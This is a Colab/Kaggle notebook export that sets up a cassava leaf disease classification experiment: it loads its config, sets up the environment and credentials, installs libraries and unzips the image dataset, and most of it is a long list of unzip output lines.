|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 Off | 00000000:00:04.0 Off | 0 |
| N/A 61C P8 12W / 70W | 0MiB / 15079MiB | 0% Default |
| | | ERR! |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
###Markdown
CFG
###Code
CONFIG_NAME = 'config06.yml'
TITLE = '06t-efficientnet_b4_ns-512'
! git clone https://github.com/raijin0704/cassava.git
# ====================================================
# CFG
# ====================================================
import yaml
CONFIG_PATH = f'./cassava/config/{CONFIG_NAME}'
with open(CONFIG_PATH) as f:
    config = yaml.safe_load(f)  # yaml.load without a Loader is rejected by newer PyYAML
INFO = config['info']
TAG = config['tag']
CFG = config['cfg']
CFG['train'] = True
CFG['inference'] = False
# CFG['debug'] = True
if CFG['debug']:
CFG['epochs'] = 1
assert INFO['TITLE'] == TITLE
###Output
Cloning into 'cassava'...
remote: Enumerating objects: 75, done.[K
remote: Counting objects: 100% (75/75), done.[K
remote: Compressing objects: 100% (68/68), done.[K
remote: Total 75 (delta 48), reused 10 (delta 5), pack-reused 0[K
Unpacking objects: 100% (75/75), done.
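###Markdown
For reference, the keys accessed above imply a config layout roughly like the sketch below. This is only an assumption reconstructed from the code in this notebook; the real contents of `config06.yml` are not shown here, and every value is a placeholder.
###Code
# Hypothetical shape of the loaded config (assumption; only the keys this
# notebook actually reads are listed, and all values are placeholders).
example_config = {
    'info': {
        'TITLE': '06t-efficientnet_b4_ns-512',  # checked by the assert above
        'PROJECT_ID': '<gcp-project-id>',       # read later as INFO['PROJECT_ID']
    },
    'tag': {},                                  # experiment tags (contents unknown)
    'cfg': {
        'train': True,                          # overwritten to True above anyway
        'inference': False,                     # overwritten to False above
        'debug': False,
        'epochs': 10,                           # placeholder; forced to 1 when debug
    },
}
###Output
_____no_output_____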
###Markdown
Environment-specific setup for Colab & Kaggle notebooks Colab
###Code
def _colab_kaggle_authority():
from googleapiclient.discovery import build
import io, os
from googleapiclient.http import MediaIoBaseDownload
drive_service = build('drive', 'v3')
results = drive_service.files().list(
q="name = 'kaggle.json'", fields="files(id)").execute()
kaggle_api_key = results.get('files', [])
filename = "/root/.kaggle/kaggle.json"
os.makedirs(os.path.dirname(filename), exist_ok=True)
request = drive_service.files().get_media(fileId=kaggle_api_key[0]['id'])
fh = io.FileIO(filename, 'wb')
downloader = MediaIoBaseDownload(fh, request)
done = False
while done is False:
status, done = downloader.next_chunk()
print("Download %d%%." % int(status.progress() * 100))
os.chmod(filename, 600)
def process_colab():
import subprocess
    # Mount Google Drive
from google.colab import drive
drive.mount('/content/drive')
    # Authenticate to Google Cloud
from google.colab import auth
auth.authenticate_user()
    # Kaggle setup
# _colab_kaggle_authority()
# subprocess.run('pip install --upgrade --force-reinstall --no-deps kaggle'.split(' '))
    # Install libraries
subprocess.run('pip install --upgrade opencv-python'.split(' '))
subprocess.run('pip install --upgrade albumentations'.split(' '))
subprocess.run('pip install timm'.split(' '))
    # Path settings
# DATA_PATH = '/content/drive/Shareddrives/便利用/kaggle/cassava/input/'
# ! cp -r /content/drive/Shareddrives/便利用/kaggle/cassava/input /content/input
DATA_PATH = '/content/input/'
OUTPUT_DIR = './output/'
NOTEBOOK_PATH = f'/content/drive/Shareddrives/便利用/kaggle/cassava/notebook/{TITLE}.ipynb'
return DATA_PATH, OUTPUT_DIR, NOTEBOOK_PATH
###Output
_____no_output_____
###Markdown
kaggle notebook
###Code
def _kaggle_gcp_authority():
from kaggle_secrets import UserSecretsClient
user_secrets = UserSecretsClient()
user_credential = user_secrets.get_gcloud_credential()
user_secrets.set_tensorflow_credential(user_credential)
def process_kaggle():
    # GCP setup
_kaggle_gcp_authority()
    # Path settings
DATA_PATH = '../input/cassava-leaf-disease-classification/'
OUTPUT_DIR = './'
# NOTEBOOK_PATH = './__notebook__.ipynb'
NOTEBOOK_PATH = f'/content/drive/Shareddrives/便利用/kaggle/cassava/notebook/{TITLE}.ipynb'
# system path
import sys
sys.path.append('../input/pytorch-image-models/pytorch-image-models-master')
return DATA_PATH, OUTPUT_DIR, NOTEBOOK_PATH
###Output
_____no_output_____
###Markdown
Common
###Code
def process_common():
# ライブラリ関係
import subprocess
subprocess.run('pip install mlflow'.split(' '))
    # Environment variables
import os
os.environ["GCLOUD_PROJECT"] = INFO['PROJECT_ID']
try:
from google.colab import auth
except ImportError:
DATA_PATH, OUTPUT_DIR, NOTEBOOK_PATH = process_kaggle()
else:
DATA_PATH, OUTPUT_DIR, NOTEBOOK_PATH = process_colab()
finally:
process_common()
!rm -r /content/input
import os
try:
from google.colab import auth
except ImportError:
pass
else:
! cp /content/drive/Shareddrives/便利用/kaggle/cassava/input.zip /content/input.zip
! unzip input.zip
! rm input.zip
train_num = len(os.listdir(DATA_PATH+"/train_images"))
assert train_num == 21397
###Output
Streaming output truncated to the last 5000 lines.
  inflating: input/train_images/1137739472.jpg
  inflating: input/train_images/441313044.jpg
  inflating: input/train_images/982733151.jpg
  ... (one "inflating: input/train_images/<image_id>.jpg" line per extracted training image; thousands of similar lines omitted) ...
  inflating: input/train_images/3654524052.jpg
inflating: input/train_images/475756576.jpg
inflating: input/train_images/1855684239.jpg
inflating: input/train_images/1677019415.jpg
inflating: input/train_images/3377004222.jpg
inflating: input/train_images/2108674538.jpg
inflating: input/train_images/4069208912.jpg
inflating: input/train_images/340885349.jpg
inflating: input/train_images/689108493.jpg
inflating: input/train_images/690578148.jpg
inflating: input/train_images/4247295410.jpg
inflating: input/train_images/2147728293.jpg
inflating: input/train_images/330459705.jpg
inflating: input/train_images/1835826214.jpg
inflating: input/train_images/3564085262.jpg
inflating: input/train_images/3304054356.jpg
inflating: input/train_images/1855493278.jpg
inflating: input/train_images/2112871300.jpg
inflating: input/train_images/2190536713.jpg
inflating: input/train_images/2917202983.jpg
inflating: input/train_images/2473152942.jpg
inflating: input/train_images/932990043.jpg
inflating: input/train_images/2699152924.jpg
inflating: input/train_images/3608836660.jpg
inflating: input/train_images/4240281500.jpg
inflating: input/train_images/2154958086.jpg
inflating: input/train_images/435952255.jpg
inflating: input/train_images/340248030.jpg
inflating: input/train_images/2282200395.jpg
inflating: input/train_images/755073612.jpg
inflating: input/train_images/812408252.jpg
inflating: input/train_images/2492550594.jpg
inflating: input/train_images/292859382.jpg
inflating: input/train_images/1710665856.jpg
inflating: input/train_images/2148458142.jpg
inflating: input/train_images/1858309623.jpg
inflating: input/train_images/2443920111.jpg
inflating: input/train_images/487175432.jpg
inflating: input/train_images/2154826831.jpg
inflating: input/train_images/3097661849.jpg
inflating: input/train_images/1304731693.jpg
inflating: input/train_images/1041588404.jpg
inflating: input/train_images/1332894133.jpg
inflating: input/train_images/1424184391.jpg
inflating: input/train_images/2556137627.jpg
inflating: input/train_images/2600531939.jpg
inflating: input/train_images/1365114577.jpg
inflating: input/train_images/3453865390.jpg
inflating: input/train_images/2297731997.jpg
inflating: input/train_images/336962626.jpg
inflating: input/train_images/1965932647.jpg
inflating: input/train_images/3896618890.jpg
inflating: input/train_images/350684447.jpg
inflating: input/train_images/472839300.jpg
inflating: input/train_images/983014273.jpg
inflating: input/train_images/2392144549.jpg
inflating: input/train_images/2206285676.jpg
inflating: input/train_images/1359200021.jpg
inflating: input/train_images/1224742642.jpg
inflating: input/train_images/3009386931.jpg
inflating: input/train_images/2503151412.jpg
inflating: input/train_images/2516082759.jpg
inflating: input/train_images/1942589536.jpg
inflating: input/train_images/3914258603.jpg
inflating: input/train_images/1149189284.jpg
inflating: input/train_images/3037767592.jpg
inflating: input/train_images/2268584645.jpg
inflating: input/train_images/2760525879.jpg
inflating: input/train_images/3048278043.jpg
inflating: input/train_images/1338751464.jpg
inflating: input/train_images/1696364421.jpg
inflating: input/train_images/1667294993.jpg
inflating: input/train_images/3692342611.jpg
inflating: input/train_images/4113877744.jpg
inflating: input/train_images/3388412714.jpg
inflating: input/train_images/3227590908.jpg
inflating: input/train_images/3731977760.jpg
inflating: input/train_images/3102877932.jpg
inflating: input/train_images/1242176689.jpg
inflating: input/train_images/3678773878.jpg
inflating: input/train_images/4288249349.jpg
inflating: input/train_images/2510540586.jpg
inflating: input/train_images/1866826606.jpg
inflating: input/train_images/435404397.jpg
inflating: input/train_images/3904989683.jpg
inflating: input/train_images/2325685392.jpg
inflating: input/train_images/3926359515.jpg
inflating: input/train_images/1933911755.jpg
inflating: input/train_images/1129442307.jpg
inflating: input/train_images/737753256.jpg
inflating: input/train_images/2338213285.jpg
inflating: input/train_images/526842311.jpg
inflating: input/train_images/719562902.jpg
inflating: input/train_images/1890285082.jpg
inflating: input/train_images/2761769890.jpg
inflating: input/train_images/2635668715.jpg
inflating: input/train_images/395071544.jpg
inflating: input/train_images/933311576.jpg
inflating: input/train_images/1214320013.jpg
inflating: input/train_images/1340939411.jpg
inflating: input/train_images/4019472268.jpg
inflating: input/train_images/3166562991.jpg
inflating: input/train_images/3934432993.jpg
inflating: input/train_images/907434734.jpg
inflating: input/train_images/3977934674.jpg
inflating: input/train_images/2010268546.jpg
inflating: input/train_images/518284284.jpg
inflating: input/train_images/1753499945.jpg
inflating: input/train_images/1916496572.jpg
inflating: input/train_images/1272495783.jpg
inflating: input/train_images/408144068.jpg
inflating: input/train_images/3773184372.jpg
inflating: input/train_images/3251960666.jpg
inflating: input/train_images/605794963.jpg
inflating: input/train_images/2491752039.jpg
inflating: input/train_images/2157497391.jpg
inflating: input/train_images/3525137356.jpg
inflating: input/train_images/1428569100.jpg
inflating: input/train_images/376083914.jpg
inflating: input/train_images/2215986164.jpg
inflating: input/train_images/166688569.jpg
inflating: input/train_images/1600111988.jpg
inflating: input/train_images/2436214521.jpg
inflating: input/train_images/1129668095.jpg
inflating: input/train_images/3909366564.jpg
inflating: input/train_images/2466474683.jpg
inflating: input/train_images/571328280.jpg
inflating: input/train_images/2757749488.jpg
inflating: input/train_images/2733805167.jpg
inflating: input/train_images/4007199956.jpg
inflating: input/train_images/1239119385.jpg
inflating: input/train_images/184462493.jpg
inflating: input/train_images/2329257679.jpg
inflating: input/train_images/442989383.jpg
inflating: input/train_images/136815898.jpg
inflating: input/train_images/585209164.jpg
inflating: input/train_images/488438522.jpg
inflating: input/train_images/987159645.jpg
inflating: input/train_images/813509621.jpg
inflating: input/train_images/463752462.jpg
inflating: input/train_images/2324804154.jpg
inflating: input/train_images/1660278504.jpg
inflating: input/train_images/2100448540.jpg
inflating: input/train_images/410863155.jpg
inflating: input/train_images/3598509491.jpg
inflating: input/train_images/1067302519.jpg
inflating: input/train_images/1245945074.jpg
inflating: input/train_images/2928220238.jpg
inflating: input/train_images/2998191298.jpg
inflating: input/train_images/3717608172.jpg
inflating: input/train_images/2194319348.jpg
inflating: input/train_images/3269286573.jpg
inflating: input/train_images/261186049.jpg
inflating: input/train_images/3289401619.jpg
inflating: input/train_images/3968048683.jpg
inflating: input/train_images/187887606.jpg
inflating: input/train_images/1683556923.jpg
inflating: input/train_images/1989483426.jpg
inflating: input/train_images/549854027.jpg
inflating: input/train_images/3244462441.jpg
inflating: input/train_images/2276395594.jpg
inflating: input/train_images/4156138691.jpg
inflating: input/train_images/4044829046.jpg
inflating: input/train_images/2377043047.jpg
inflating: input/train_images/1145084928.jpg
inflating: input/train_images/2554260896.jpg
inflating: input/train_images/1424905982.jpg
inflating: input/train_images/2178037336.jpg
inflating: input/train_images/2318645335.jpg
inflating: input/train_images/2297472102.jpg
inflating: input/train_images/206432986.jpg
inflating: input/train_images/1971427379.jpg
inflating: input/train_images/1212460226.jpg
inflating: input/train_images/940939729.jpg
inflating: input/train_images/972649867.jpg
inflating: input/train_images/1912329791.jpg
inflating: input/train_images/2115543310.jpg
inflating: input/train_images/2544507899.jpg
inflating: input/train_images/3478417480.jpg
inflating: input/train_images/3564855382.jpg
inflating: input/train_images/743850893.jpg
inflating: input/train_images/4179630738.jpg
inflating: input/train_images/1808921036.jpg
inflating: input/train_images/2781831798.jpg
inflating: input/train_images/2761141056.jpg
inflating: input/train_images/3838540238.jpg
inflating: input/train_images/2406694792.jpg
inflating: input/train_images/2653833670.jpg
inflating: input/train_images/1440401494.jpg
inflating: input/train_images/2522202499.jpg
inflating: input/train_images/3974455402.jpg
inflating: input/train_images/439049574.jpg
inflating: input/train_images/3378967649.jpg
inflating: input/train_images/1962020298.jpg
inflating: input/train_images/2744104425.jpg
inflating: input/train_images/2937855140.jpg
inflating: input/train_images/3237815335.jpg
inflating: input/train_images/4060450564.jpg
inflating: input/train_images/847847826.jpg
inflating: input/train_images/3741168853.jpg
inflating: input/train_images/3444851887.jpg
inflating: input/train_images/424246187.jpg
inflating: input/train_images/887272418.jpg
inflating: input/train_images/1269646820.jpg
inflating: input/train_images/3927154512.jpg
inflating: input/train_images/227631164.jpg
inflating: input/train_images/1096438409.jpg
inflating: input/train_images/4130960215.jpg
inflating: input/train_images/2589571181.jpg
inflating: input/train_images/2936101260.jpg
inflating: input/train_images/744968127.jpg
inflating: input/train_images/2182855809.jpg
inflating: input/train_images/2484471054.jpg
inflating: input/train_images/2198789414.jpg
inflating: input/train_images/1277679675.jpg
inflating: input/train_images/1981710530.jpg
inflating: input/train_images/2687625618.jpg
inflating: input/train_images/15175683.jpg
inflating: input/train_images/1025060651.jpg
inflating: input/train_images/147082706.jpg
inflating: input/train_images/879360102.jpg
inflating: input/train_images/3138454359.jpg
inflating: input/train_images/1853237353.jpg
inflating: input/train_images/1156963169.jpg
inflating: input/train_images/4252058382.jpg
inflating: input/train_images/3672574295.jpg
inflating: input/train_images/3602124236.jpg
inflating: input/train_images/3044653418.jpg
inflating: input/train_images/2527606306.jpg
inflating: input/train_images/3254091350.jpg
inflating: input/train_images/306210288.jpg
inflating: input/train_images/336083586.jpg
inflating: input/train_images/3570056225.jpg
inflating: input/train_images/4281504647.jpg
inflating: input/train_images/1974290297.jpg
inflating: input/train_images/2587436758.jpg
inflating: input/train_images/1017670009.jpg
inflating: input/train_images/4290827656.jpg
inflating: input/train_images/3814975148.jpg
inflating: input/train_images/3704210007.jpg
inflating: input/train_images/1398282852.jpg
inflating: input/train_images/278898129.jpg
inflating: input/train_images/1859307222.jpg
inflating: input/train_images/72925791.jpg
inflating: input/train_images/806702626.jpg
inflating: input/train_images/2509495518.jpg
inflating: input/train_images/3529355178.jpg
inflating: input/train_images/2497160011.jpg
inflating: input/train_images/3649285117.jpg
inflating: input/train_images/1675758805.jpg
inflating: input/train_images/3889376143.jpg
inflating: input/train_images/1811483991.jpg
inflating: input/train_images/2935901261.jpg
inflating: input/train_images/3156591589.jpg
inflating: input/train_images/1136746572.jpg
inflating: input/train_images/2801545272.jpg
inflating: input/train_images/2590675849.jpg
inflating: input/train_images/4091333216.jpg
inflating: input/train_images/830380663.jpg
inflating: input/train_images/1495222609.jpg
inflating: input/train_images/2684560144.jpg
inflating: input/train_images/2442826642.jpg
inflating: input/train_images/2431603043.jpg
inflating: input/train_images/1148219268.jpg
inflating: input/train_images/3398807044.jpg
inflating: input/train_images/2271308515.jpg
inflating: input/train_images/720776367.jpg
inflating: input/train_images/2377974845.jpg
inflating: input/train_images/3829413649.jpg
inflating: input/train_images/3518069486.jpg
inflating: input/train_images/1359893940.jpg
inflating: input/train_images/3295623672.jpg
inflating: input/train_images/3948333262.jpg
inflating: input/train_images/472370398.jpg
inflating: input/train_images/995221528.jpg
inflating: input/train_images/2663709463.jpg
inflating: input/train_images/2032736928.jpg
inflating: input/train_images/2642446422.jpg
inflating: input/train_images/577090506.jpg
inflating: input/train_images/208832652.jpg
inflating: input/train_images/2377945699.jpg
inflating: input/train_images/3870800967.jpg
inflating: input/train_images/2807877356.jpg
inflating: input/train_images/690565188.jpg
inflating: input/train_images/1839152868.jpg
inflating: input/train_images/630407730.jpg
inflating: input/train_images/2426854829.jpg
inflating: input/train_images/3968955392.jpg
inflating: input/train_images/105741284.jpg
inflating: input/train_images/591335475.jpg
inflating: input/train_images/358985142.jpg
inflating: input/train_images/2199231317.jpg
inflating: input/train_images/667282886.jpg
inflating: input/train_images/542560691.jpg
inflating: input/train_images/2734892772.jpg
inflating: input/train_images/2097195239.jpg
inflating: input/train_images/1090116806.jpg
inflating: input/train_images/2372500857.jpg
inflating: input/train_images/874878736.jpg
inflating: input/train_images/3332684410.jpg
inflating: input/train_images/2107489867.jpg
inflating: input/train_images/1127545108.jpg
inflating: input/train_images/3964970132.jpg
inflating: input/train_images/986888785.jpg
inflating: input/train_images/3419923779.jpg
inflating: input/train_images/802266352.jpg
inflating: input/train_images/3882109848.jpg
inflating: input/train_images/2320107173.jpg
inflating: input/train_images/1435727833.jpg
inflating: input/train_images/1535887769.jpg
inflating: input/train_images/4029027750.jpg
inflating: input/train_images/212573449.jpg
inflating: input/train_images/2721767282.jpg
inflating: input/train_images/3585245374.jpg
inflating: input/train_images/2650131569.jpg
inflating: input/train_images/1012804587.jpg
inflating: input/train_images/1909520119.jpg
inflating: input/train_images/1375245484.jpg
inflating: input/train_images/1323997328.jpg
inflating: input/train_images/1538926850.jpg
inflating: input/train_images/52883488.jpg
inflating: input/train_images/1758003075.jpg
inflating: input/train_images/2342455447.jpg
inflating: input/train_images/3058038323.jpg
inflating: input/train_images/3625017880.jpg
inflating: input/train_images/2278938430.jpg
inflating: input/train_images/1351433725.jpg
inflating: input/train_images/1553995001.jpg
inflating: input/train_images/2936687909.jpg
inflating: input/train_images/522209459.jpg
inflating: input/train_images/252899909.jpg
inflating: input/train_images/3489514020.jpg
inflating: input/train_images/206053415.jpg
inflating: input/train_images/84024270.jpg
inflating: input/train_images/4175172679.jpg
inflating: input/train_images/2607316834.jpg
inflating: input/train_images/743721638.jpg
inflating: input/train_images/3542289007.jpg
inflating: input/train_images/955346673.jpg
inflating: input/train_images/3221754335.jpg
inflating: input/train_images/1135103288.jpg
inflating: input/train_images/1364435251.jpg
inflating: input/train_images/192970946.jpg
inflating: input/train_images/1583439213.jpg
inflating: input/train_images/3362457506.jpg
inflating: input/train_images/3516286553.jpg
inflating: input/train_images/3211556241.jpg
inflating: input/train_images/2764717089.jpg
inflating: input/train_images/1052881053.jpg
inflating: input/train_images/1770197152.jpg
inflating: input/train_images/525742373.jpg
inflating: input/train_images/1348307468.jpg
inflating: input/train_images/2418850424.jpg
inflating: input/train_images/663810012.jpg
inflating: input/train_images/1558058751.jpg
inflating: input/train_images/1405323651.jpg
inflating: input/train_images/1785877990.jpg
inflating: input/train_images/560888503.jpg
inflating: input/train_images/65344468.jpg
inflating: input/train_images/1244124878.jpg
inflating: input/train_images/781931652.jpg
inflating: input/train_images/2091943364.jpg
inflating: input/train_images/3031817409.jpg
inflating: input/train_images/2066965759.jpg
inflating: input/train_images/1403068754.jpg
inflating: input/train_images/3501100214.jpg
inflating: input/train_images/2473268326.jpg
inflating: input/train_images/3992628804.jpg
inflating: input/train_images/2170455392.jpg
inflating: input/train_images/3038549667.jpg
inflating: input/train_images/2491179665.jpg
inflating: input/train_images/1211187400.jpg
inflating: input/train_images/3909952620.jpg
inflating: input/train_images/2445684335.jpg
inflating: input/train_images/2847670157.jpg
inflating: input/train_images/307148103.jpg
inflating: input/train_images/3800475083.jpg
inflating: input/train_images/1201690046.jpg
inflating: input/train_images/1179237425.jpg
inflating: input/train_images/2703475066.jpg
inflating: input/train_images/370481129.jpg
inflating: input/train_images/1873204876.jpg
inflating: input/train_images/1354380890.jpg
inflating: input/train_images/1822627582.jpg
inflating: input/train_images/2486584885.jpg
inflating: input/train_images/1535057791.jpg
inflating: input/train_images/4284057693.jpg
inflating: input/train_images/3606325619.jpg
inflating: input/train_images/3947205646.jpg
inflating: input/train_images/1352603733.jpg
inflating: input/train_images/2642951848.jpg
inflating: input/train_images/645991519.jpg
inflating: input/train_images/1101409116.jpg
inflating: input/train_images/1995180992.jpg
inflating: input/train_images/4149439273.jpg
inflating: input/train_images/1086549590.jpg
inflating: input/train_images/2428748411.jpg
inflating: input/train_images/3493232417.jpg
inflating: input/train_images/1581083088.jpg
inflating: input/train_images/2410206880.jpg
inflating: input/train_images/2178737885.jpg
inflating: input/train_images/3189838386.jpg
inflating: input/train_images/466665230.jpg
inflating: input/train_images/4111579304.jpg
inflating: input/train_images/2757717680.jpg
inflating: input/train_images/634724499.jpg
inflating: input/train_images/3219226576.jpg
inflating: input/train_images/747761920.jpg
inflating: input/train_images/2275462714.jpg
inflating: input/train_images/335204978.jpg
inflating: input/train_images/1024067372.jpg
inflating: input/train_images/2396049466.jpg
inflating: input/train_images/3688162570.jpg
inflating: input/train_images/1201158169.jpg
inflating: input/train_images/785251696.jpg
inflating: input/train_images/4212381540.jpg
inflating: input/train_images/3909502094.jpg
inflating: input/train_images/1963744346.jpg
inflating: input/train_images/4205544766.jpg
inflating: input/train_images/368507715.jpg
inflating: input/train_images/2797119560.jpg
inflating: input/train_images/1557398186.jpg
inflating: input/train_images/2820350.jpg
inflating: input/train_images/3339979490.jpg
inflating: input/train_images/1445721278.jpg
inflating: input/train_images/1782735402.jpg
inflating: input/train_images/2768992642.jpg
inflating: input/train_images/3174117407.jpg
inflating: input/train_images/2850943526.jpg
inflating: input/train_images/3058839740.jpg
inflating: input/train_images/1775924817.jpg
inflating: input/train_images/3788064831.jpg
inflating: input/train_images/1979663030.jpg
inflating: input/train_images/1829820794.jpg
inflating: input/train_images/2932123995.jpg
inflating: input/train_images/866496354.jpg
inflating: input/train_images/2783143835.jpg
inflating: input/train_images/338055646.jpg
inflating: input/train_images/936438569.jpg
inflating: input/train_images/460888118.jpg
inflating: input/train_images/2806775485.jpg
inflating: input/train_images/4037829966.jpg
inflating: input/train_images/3205038032.jpg
inflating: input/train_images/3381060071.jpg
inflating: input/train_images/2662418280.jpg
inflating: input/train_images/1685008458.jpg
inflating: input/train_images/4265846658.jpg
inflating: input/train_images/414229694.jpg
inflating: input/train_images/2111097529.jpg
inflating: input/train_images/3645245816.jpg
inflating: input/train_images/4010091989.jpg
inflating: input/train_images/1518858149.jpg
inflating: input/train_images/1993626674.jpg
inflating: input/train_images/51063556.jpg
inflating: input/train_images/4049843068.jpg
inflating: input/train_images/2175002388.jpg
inflating: input/train_images/3250432393.jpg
inflating: input/train_images/3904531265.jpg
inflating: input/train_images/3660846961.jpg
inflating: input/train_images/1602453903.jpg
inflating: input/train_images/1285287595.jpg
inflating: input/train_images/1496786758.jpg
inflating: input/train_images/2348020586.jpg
inflating: input/train_images/3001133912.jpg
inflating: input/train_images/2249767695.jpg
inflating: input/train_images/1776919078.jpg
inflating: input/train_images/175816110.jpg
inflating: input/train_images/24632378.jpg
inflating: input/train_images/3778551901.jpg
inflating: input/train_images/2457010245.jpg
inflating: input/train_images/3057848148.jpg
inflating: input/train_images/867025399.jpg
inflating: input/train_images/1823796412.jpg
inflating: input/train_images/1290043327.jpg
inflating: input/train_images/3949530220.jpg
inflating: input/train_images/2424770024.jpg
inflating: input/train_images/3537938630.jpg
inflating: input/train_images/2615629258.jpg
inflating: input/train_images/3053608144.jpg
inflating: input/train_images/2458565094.jpg
inflating: input/train_images/1434278080.jpg
inflating: input/train_images/4180192243.jpg
inflating: input/train_images/2349165022.jpg
inflating: input/train_images/4099004871.jpg
inflating: input/train_images/323293221.jpg
inflating: input/train_images/334748709.jpg
inflating: input/train_images/2265305065.jpg
inflating: input/train_images/2511157697.jpg
inflating: input/train_images/2681562878.jpg
inflating: input/train_images/2326806135.jpg
inflating: input/train_images/1380110739.jpg
inflating: input/train_images/1110421964.jpg
inflating: input/train_images/1059986462.jpg
inflating: input/train_images/3743195625.jpg
inflating: input/train_images/1001320321.jpg
inflating: input/train_images/1234375577.jpg
inflating: input/train_images/2553757426.jpg
inflating: input/train_images/554189180.jpg
inflating: input/train_images/3628996963.jpg
inflating: input/train_images/1445369057.jpg
inflating: input/train_images/2363265177.jpg
inflating: input/train_images/1098184586.jpg
inflating: input/train_images/1351337979.jpg
inflating: input/train_images/2659141611.jpg
inflating: input/train_images/3920121408.jpg
inflating: input/train_images/2447086641.jpg
inflating: input/train_images/137038681.jpg
inflating: input/train_images/130685384.jpg
inflating: input/train_images/4182626844.jpg
inflating: input/train_images/2705031352.jpg
inflating: input/train_images/2583781568.jpg
inflating: input/train_images/98151706.jpg
inflating: input/train_images/1902806995.jpg
inflating: input/train_images/3760730104.jpg
inflating: input/train_images/3504669411.jpg
inflating: input/train_images/641947553.jpg
inflating: input/train_images/4056070889.jpg
inflating: input/train_images/2903629810.jpg
inflating: input/train_images/1450741896.jpg
inflating: input/train_images/1837284696.jpg
inflating: input/train_images/3114522519.jpg
inflating: input/train_images/3272750945.jpg
inflating: input/train_images/1659403875.jpg
inflating: input/train_images/2904671058.jpg
inflating: input/train_images/3993617081.jpg
inflating: input/train_images/1047894047.jpg
inflating: input/train_images/1178307457.jpg
inflating: input/train_images/489369440.jpg
inflating: input/train_images/2344592304.jpg
inflating: input/train_images/422632532.jpg
inflating: input/train_images/2021239499.jpg
inflating: input/train_images/1268162819.jpg
inflating: input/train_images/2254310915.jpg
inflating: input/train_images/737157935.jpg
inflating: input/train_images/2473286391.jpg
inflating: input/train_images/2952187496.jpg
inflating: input/train_images/2859464940.jpg
inflating: input/train_images/1991065222.jpg
inflating: input/train_images/748154559.jpg
inflating: input/train_images/2077965062.jpg
inflating: input/train_images/15383908.jpg
inflating: input/train_images/1637611911.jpg
inflating: input/train_images/1456881000.jpg
inflating: input/train_images/3889601162.jpg
inflating: input/train_images/107458529.jpg
inflating: input/train_images/726108789.jpg
inflating: input/train_images/2978135052.jpg
inflating: input/train_images/3467700084.jpg
inflating: input/train_images/1558263812.jpg
inflating: input/train_images/2009674442.jpg
inflating: input/train_images/1079107547.jpg
inflating: input/train_images/2722340963.jpg
inflating: input/train_images/2469652661.jpg
inflating: input/train_images/219505342.jpg
inflating: input/train_images/2091547987.jpg
inflating: input/train_images/3119699604.jpg
inflating: input/train_images/1016415263.jpg
inflating: input/train_images/1286002720.jpg
inflating: input/train_images/745112623.jpg
inflating: input/train_images/1251319553.jpg
inflating: input/train_images/2080055302.jpg
inflating: input/train_images/4084600785.jpg
inflating: input/train_images/146247693.jpg
inflating: input/train_images/214207820.jpg
inflating: input/train_images/1899678596.jpg
inflating: input/train_images/3718347785.jpg
inflating: input/train_images/3735709482.jpg
inflating: input/train_images/2401581385.jpg
inflating: input/train_images/2338923245.jpg
inflating: input/train_images/2969200705.jpg
inflating: input/train_images/2888341148.jpg
inflating: input/train_images/4282908664.jpg
inflating: input/train_images/3443567177.jpg
inflating: input/train_images/227245436.jpg
inflating: input/train_images/1060214168.jpg
inflating: input/train_images/2447025051.jpg
inflating: input/train_images/3030726237.jpg
inflating: input/train_images/1193388066.jpg
inflating: input/train_images/1226905166.jpg
inflating: input/train_images/1025466430.jpg
inflating: input/train_images/4054194563.jpg
inflating: input/train_images/769509727.jpg
inflating: input/train_images/446547261.jpg
inflating: input/train_images/1551517348.jpg
inflating: input/train_images/2754223528.jpg
inflating: input/train_images/2765109909.jpg
inflating: input/train_images/714060321.jpg
inflating: input/train_images/1007700625.jpg
inflating: input/train_images/2059180039.jpg
inflating: input/train_images/4213471018.jpg
inflating: input/train_images/3934403227.jpg
inflating: input/train_images/3241444808.jpg
inflating: input/train_images/1751949402.jpg
inflating: input/train_images/3833349143.jpg
inflating: input/train_images/1747286543.jpg
inflating: input/train_images/587829607.jpg
inflating: input/train_images/287967918.jpg
inflating: input/train_images/1315703561.jpg
inflating: input/train_images/3438538629.jpg
inflating: input/train_images/3848359159.jpg
inflating: input/train_images/1624580117.jpg
inflating: input/train_images/3357188995.jpg
inflating: input/train_images/4199549961.jpg
inflating: input/train_images/359920987.jpg
inflating: input/train_images/1970622259.jpg
inflating: input/train_images/43727066.jpg
inflating: input/train_images/1040876350.jpg
inflating: input/train_images/1579937444.jpg
inflating: input/train_images/1903746269.jpg
inflating: input/train_images/2306385345.jpg
inflating: input/train_images/4084470563.jpg
inflating: input/train_images/2789524005.jpg
inflating: input/train_images/897745173.jpg
inflating: input/train_images/2848007232.jpg
inflating: input/train_images/339595487.jpg
inflating: input/train_images/913436788.jpg
inflating: input/train_images/1234294272.jpg
inflating: input/train_images/1159573446.jpg
inflating: input/train_images/3203849568.jpg
inflating: input/train_images/3597887012.jpg
inflating: input/train_images/3666469133.jpg
inflating: input/train_images/2412773929.jpg
inflating: input/train_images/1625527821.jpg
inflating: input/train_images/3218262834.jpg
inflating: input/train_images/944920581.jpg
inflating: input/train_images/822120250.jpg
inflating: input/train_images/3395914437.jpg
inflating: input/train_images/2323936.jpg
inflating: input/train_images/2386253796.jpg
inflating: input/train_images/1116229616.jpg
inflating: input/train_images/365554294.jpg
inflating: input/train_images/546528869.jpg
inflating: input/train_images/1452430816.jpg
inflating: input/train_images/3645241295.jpg
inflating: input/train_images/3506364620.jpg
inflating: input/train_images/2557965026.jpg
inflating: input/train_images/3853081007.jpg
inflating: input/train_images/1658205752.jpg
inflating: input/train_images/222568522.jpg
inflating: input/train_images/3930678824.jpg
inflating: input/train_images/278959446.jpg
inflating: input/train_images/2478018732.jpg
inflating: input/train_images/1889980641.jpg
inflating: input/train_images/1807049681.jpg
inflating: input/train_images/490262929.jpg
inflating: input/train_images/1363877858.jpg
inflating: input/train_images/3829488807.jpg
inflating: input/train_images/1427193776.jpg
inflating: input/train_images/140387888.jpg
inflating: input/train_images/467965750.jpg
inflating: input/train_images/3744017930.jpg
inflating: input/train_images/1160106089.jpg
inflating: input/train_images/372067852.jpg
